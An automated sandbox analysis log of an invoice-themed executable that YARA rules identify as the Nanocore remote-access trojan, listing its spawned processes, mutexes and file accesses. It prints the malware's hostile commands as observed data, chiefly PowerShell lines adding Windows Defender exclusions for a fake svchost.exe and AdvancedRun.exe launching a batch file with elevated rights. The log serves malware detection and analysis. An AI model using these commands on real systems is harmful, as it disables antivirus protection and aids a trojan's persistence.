        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb&;$
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
        Source: classification engineClassification label: mal100.troj.evad.winEXE@50/24@7/4
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 4_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210225Jump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{883c2226-d991-4f34-8646-4dd2732a341c}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_01
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2016
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3Jump to behavior
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: CN-Invoice-XXXXX9808-19011143287994.exeVirustotal: Detection: 29%
        Source: CN-Invoice-XXXXX9808-19011143287994.exeReversingLabs: Detection: 27%
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /SpecialRun 4101d8 6980
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
